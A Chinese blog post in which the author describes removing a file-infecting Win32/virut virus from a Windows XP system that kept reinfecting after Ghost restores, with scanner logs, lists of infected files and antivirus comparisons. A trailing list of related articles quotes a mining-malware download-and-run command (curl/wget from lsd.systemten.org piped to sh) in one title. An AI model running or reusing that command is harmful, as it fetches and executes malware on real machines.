ghost之后仍然中病毒----与病毒的斗争
我的电脑系统是XP,从来都没有安装任何杀毒软件,所有的软件都是安装在C盘的,感觉系统卡顿就用Windows一键还原(基于DOS下的ghost)还原一下,一直这样挺好的。
2017年春节后,突然发现就是用ghost还原之后,也不行了,系统很快又中病毒,具体表现为:
1、排除了备份的gho系统中毒,因为这个gho系统用了两年多了一直没问题。
2、ghost后仍然中病毒,怀疑是不是鬼影病毒、机器狗、威金病毒,用diskgenius重建MBR,并且清除保留扇区,恢复后无果证明不是鬼影。搜索了C盘隐藏文件没有pcihdd.sys文件,也不是机器狗。搜索威金病毒感染标志_desktop.ini文件,也没有,证明不是威金病毒。
查看C:\WINDOWS\system32\drivers\etc\hosts文件内容:
127.0.0.1 ZieF.pl
恢复后修改为127.0.0.1 localhost,仍然感染。
3、开始运行cmd,有时无法输入任何字符。
4、感染后,用msconfig查看非Microsoft系统服务,里面增加了Volume shadow copy和Application L??? G???(名字记不清,不是微软的Application Layer Gateway Service)服务,应该是病毒的服务。
5、搜狗浏览器高速模式无法打开任何网页,IE兼容模式可以打开,有个黑色的似乎是cmd窗口一闪而过,网页排版混乱有空格。
6、smart install maker打包生成exe文件后,无法正常打开,提示不是标准的win32程序。
7、用SREng扫描,打开的时候就提示入口点错误,修复后再次打开,仍然有提示。
SREng扫描提示Explorer.exe、userinit.exe、logonui.exe、ie4uinit.exe、spoolsv.exe、conime.exe、Windows桌面更新等文件被感染。
API HOOK
入口点错误:NtCreateFile (危险等级: 高, 被下面模块所HOOK: 0x7FF93F86)
入口点错误:NtCreateProcess (危险等级: 高, 被下面模块所HOOK: 0x7FF94015)
入口点错误:NtCreateProcessEx (危险等级: 高, 被下面模块所HOOK: 0x7FF94022)
入口点错误:NtQueryInformationProcess (危险等级: 高, 被下面模块所HOOK: 0x7FF94063)
入口点错误:ZwCreateFile (危险等级: 高, 被下面模块所HOOK: 0x7FF93F86)
入口点错误:ZwCreateProcess (危险等级: 高, 被下面模块所HOOK: 0x7FF94015)
入口点错误:ZwCreateProcessEx (危险等级: 高, 被下面模块所HOOK: 0x7FF94022)
入口点错误:ZwOpenFile (危险等级: 高, 被下面模块所HOOK: 0x7FF9400B)
入口点错误:ZwQueryInformationProcess (危险等级: 高, 被下面模块所HOOK: 0x7FF94063)
==================================
启动项目
注册表
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
<shell><Explorer.exe> [(Infected) Microsoft Corporation]
<Userinit><C:\WINDOWS\system32\userinit.exe,> [(Infected) Microsoft Corporation]
<UIHost><logonui.exe> [(Infected) Microsoft Corporation]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340}]
<Windows 桌面更新><regsvr32.exe /s /n /i:U shell32.dll> [(Infected) Microsoft Corporation]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}]
<Internet Explorer 6><%SystemRoot%\system32\ie4uinit.exe> [(Infected) Microsoft Corporation]
==================================
正在运行的进程
[PID: 1664 / SYSTEM][C:\WINDOWS\system32\spoolsv.exe] [(Infected) Microsoft Corporation, 5.1.2600.6024 (xpsp_sp3_qfe.100817-1627)]
[PID: 324 / Administrator][C:\WINDOWS\Explorer.EXE] [(Infected) Microsoft Corporation, 6.00.2900.5512 (xpsp.080413-2105)]
[PID: 3544 / Administrator][C:\WINDOWS\system32\conime.exe] [(Infected) Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2105)]
==================================
进程特权扫描
特殊特权被允许: SeLoadDriverPrivilege [PID = 908, C:\WINDOWS\SYSTEM32\WINLOGON.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 1664, C:\WINDOWS\SYSTEM32\SPOOLSV.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 324, C:\WINDOWS\EXPLORER.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 3544, C:\WINDOWS\SYSTEM32\CONIME.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 2680, C:\PROGRAM FILES\MDIE\MDIE_CN.EXE]
8、用Windows清理助手ArSwp3标准扫描,发现C:\WINDOWS\及C:\WINDOWS\system32\下的系统文件被修改,好几个是核心文件:
C:\WINDOWS\explorer.exe
C:\WINDOWS\system32\userinit.exe
C:\WINDOWS\system32\mmc.exe
C:\WINDOWS\system32\clipsrv.exe
C:\WINDOWS\system32\mnmsrvc.exe
C:\WINDOWS\system32\smlogsvc.exe
按照ArSwp3的提示,从备份的C盘的gho文件中提取上述文件,放到F:\bak\arswp3\sif目录下,然后进行清理,ArSwp3清理后自动重启,并把上述文件恢复到系统中,但系统仍然是中毒状态,仍然有前面的各种中毒表现。
C:\WINDOWS\system32\dllcache\下面对应的同名文件也提示被感染。
C:\Program Files\Outlook Express\msimn.exe
C:\Program Files\Windows Media Player\wmplayer.exe
C:\Program Files\Win32Pad\win32pad.exe
C:\WINDOWS\system32\dllcache\ctfmon.exe
C:\WINDOWS\system32\ctfmon.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ctfmon.exe
C:\WINDOWS\system32\dllcache\explorer.exe
C:\WINDOWS\system32\dllcache\userinit.exe
C:\WINDOWS\inf\unregmp2.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>{22d6f312-b0f6-11d0-94ab-0080c74c7e95}\
C:\Program Files\Outlook Express\setup50.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{7790769C-0471-11d2-AF11-00C04FA35D02}\
C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\{e2e2dd38-d088-4134-82b7-f2ba38496583}\
C:\WINDOWS\system32\dllcache\NOTEPAD.EXE
C:\WINDOWS\system32\notepad.exe
C:\WINDOWS\system32\dllcache\winhlp32.exe
C:\WINDOWS\system32\winhlp32.exe
C:\WINDOWS\system32\dllcache\hh.exe
C:\WINDOWS\hh.exe
C:\WINDOWS\system32\dllcache\regedit.exe
C:\WINDOWS\regedit.exe
C:\WINDOWS\system32\dllcache\mmc.exe
C:\WINDOWS\NOTEPAD.EXE
C:\WINDOWS\system32\dllcache\clipsrv.exe
C:\WINDOWS\system32\dllcache\mnmsrvc.exe
C:\WINDOWS\system32\dllcache\smlogsvc.exe
C:\WINDOWS\system32\dllcache\vssvc.exe
C:\WINDOWS\system32\vssvc.exe
由于ArSwp3认定notepad.EXE和regedit.exe被感染,直接删除,导致记事本和注册表编辑器运行不了。
9、把一个病毒样本上传到http://virscan.org/进行云鉴定,发现61%的杀毒引擎认为有病毒,国内的引擎除360杀毒和百度杀毒外,江民杀毒、金山毒霸、瑞星、安天、费尔、熊猫卫士(总部欧洲)、趋势科技(总部美日)、安博士V3(总部韩国)都认为是病毒。
金山毒霸最新版病毒库,扫描文件总数:194881,只查杀了大约50个病毒,恢复后无果。
在官网下载瑞星杀毒V17,根本安装不上;
安天主要是网络安全产品,未尝试;
费尔是收费的未测试;
卡巴斯基太卡不爽未测试。
下载了江民杀毒速智及离线升级包update.exe,可以试用一个月。
10、安装好江民杀毒速智和离线升级包,打开电脑里面的文件,马上提示系统文件有病毒,于是利用晚上的时间进行全盘扫描,查杀了2000多个Win32/virut.bn病毒,杀毒后自动重启,第二天起来看看,sim编译打包的exe文件仍然无法运行,证明系统还是有病毒,于是再次用ghost恢复到干净的系统,恢复的时候,江民再次提示C:\WGHO\GRUB等目录的文件被感染并杀掉,恢复完毕,再次sim编译打包的exe就可以运行了,搜狗浏览器高速模式也正常,至此,问题解决。
从以上与该病毒的斗争中发现,C盘虽然恢复后没有病毒了,但是因为其他盘符里面的exe文件已被感染,再次运行染毒文件,C盘的很多系统文件就会很快地被感染,而且病毒驻留内存,伺机感染打开的文件,造成许多程序运行异常,该病毒感染速度极快,东方微点主动防御无法预防,免费的金山毒霸无法全杀,自从金山毒霸免费后,感觉越来越不行了!最后用江民杀毒全盘杀毒,而且还恢复了一次才算彻底解决!在此向江民杀毒表示忠心感谢!如果杀毒软件不能彻底杀灭非系统盘病毒,即使恢复C盘,重启后病毒仍然会死灰复燃,主动防御类新概念防毒软件根本无法彻底杀灭病毒,其本质其实是永远被动地防御病毒的入侵,根本防御不了,无法造就一个彻底干净的系统环境。因此,基于文件感染型的病毒,还是老老实实地用老版的特征码杀毒软件进行杀灭吧,查杀后才会有一个彻底干净的系统,推荐在RAMOS中安装杀毒软件,利用晚上的时间进行全盘查杀,然后进入PE进行恢复,不要用备份在硬盘上的ghost.exe来恢复,因为备份的ghost.exe可能有病毒。

ghost之后仍然中病毒----与病毒的斗争的更多相关文章

  1. Linux服务器感染kerberods病毒 | 挖矿病毒查杀及分析 | (curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh)

    概要: 一.症状及表现 二.查杀方法 三.病毒分析 四.安全防护 五.参考文章 一.症状及表现 1.CPU使用率异常,top命令显示CPU统计数数据均为0,利用busybox 查看CPU占用率之后,发 ...

  2. 关于winlogo.exe中了“落雪”病毒的解决方法

    Windows Logon Process,Windows NT 用户登陆程序,管理用户登录和退出.该进程的正常路径应是 C:\Windows\System32 且是以 SYSTEM 用户运行,若不是 ...

  3. 我尼玛,二半夜的说中photo.src病毒了。

    大半夜手机预警,中病毒了,我感觉也没啥东西呀.一个破小网站,别人黑我干啥. 登上服务器去一看,我滴个乖乖,photo.src病毒.服务器里面显示是一个背景桌面应用程序, 打算直接从文件夹删除,但是正在 ...

  4. centos系统中perl进程病毒占用大量网络流量导致网络瘫痪的问题分析及解决方案

    故障现象: 1.系统在早上9点的时候非常慢,单台服务器占用流量很大,使交换机流量被占满,而连累挂在同一交换机上的其他应用也无法提供服务,或者速度非常慢     2.通过查看进程发现大量的perl程序占 ...

  5. 高速清除winXP系统中explorer.exe病毒

    关于这个explorer.exe病毒.是眼下xp最为常见的一个病毒,会大量的消耗系统资源,造成电脑特别的卡顿. 1.关闭还原(假设没有,则跳过),为的是防止我们改动后,还原之后又回来了. 2.打开注冊 ...

  6. 服务器中了蠕虫病毒Wannamine2.0小记

    近期用户反馈某台服务器总感觉性能不是很好存在卡顿,于是今天远程上去分析. 打开任务管理器发现CPU使用率非常低,内存使用也在接受范围内(10/64G).不过我有一个偏好就是不喜欢用系统自带的任务管理器 ...

  7. win7系统防止中招勒索病毒

    echo @@ netsh advfirewall firewall add rule name= netsh advfirewall firewall add rule name= netsh ad ...

  8. 中了勒索病毒的win7系统

  9. 基于Linux平台病毒BlackHole病毒的决心

    今天会见了病毒,少量的代码,但在使用小漏洞的函数的,真正的杀伤力相当惊人. 转载请注明出处:http://blog.csdn.net/u010484477谢谢^_^ watermark/2/text/ ...

随机推荐

  1. OpenCV 自定义任意区域形状及计算平均值 方差

    opencv中有矩形的Rect函数.圆形的circl函数等,那么任意形状怎么取呢?方法1:点乘,将其形状与图像进行点乘,求其形状对应的图像形状:方法2:用findContours函数得对应的形状区域, ...

  2. Gym.101908 Brazil Subregional Programming Contest(寒假自训第六场)

    这几天睡眠时间都不太够,室友晚上太会折腾了,感觉有点累,所以昨天的题解也没写,看晚上能不能补起来. B . Marbles 题意:给定N组数(xi,yi),玩家轮流操作,每次玩家可以选择其中一组对其操 ...

  3. 安装Ubuntu16.04与windows10双系统后,如何修改启动默认设置

    在安装了Ubuntu16.04系统之后,系统会默认自启动Ubuntu16.04,而我们大多数情况下可能都在使用windows系统,不修改默认设置,不经意间便会启动了Ubuntu16.04,通过我的经历 ...

  4. C++学习(二十五)(C语言部分)之 结构体2

    基本概述: int double char; 定义一个学生类型 int Student 姓名 性别 年龄 简单地说 结构体是一个可以包含不同类型的结构,他是一个自定义的类型. struct 结构体标识 ...

  5. 简单说明 Virtual DOM 为啥快

    Virtual DOM 就是用 JS 的对象来描述 DOM 结构的一个 DOM 树.如: var element = { tagName: 'ul', // 节点标签名 props: { // DOM ...

  6. linux下寻找段错误的方法

    为了能够快速找到发生段错误的地方,记录以下两种方法. objdump和backtrace的配合使用 :https://www.cnblogs.com/jiangyibo/p/9507555.html ...

  7. 从简单的mongodb example 的观察

    https://github.com/no7dw/mongodb-example 这是最基础的连接查询.(branch master) var MongoClient = require('mongo ...

  8. Python知识点整理,基础1 - 基本语法

  9. linux(kali,centos)安装vm及其提示缺少c头文件解决方法

    我电脑系统是kali最新版 首先去官网下一个vm安装包,给个直达网址 http://www.vmware.com/cn/products/workstation/workstation-evaluat ...

  10. day 51 html 学习 js 学习

    函数 函数定义 JavaScript中的函数和Python中的非常类似,只是定义方式有点区别 // 普通函数定义 function f1() { console.log("Hello wor ...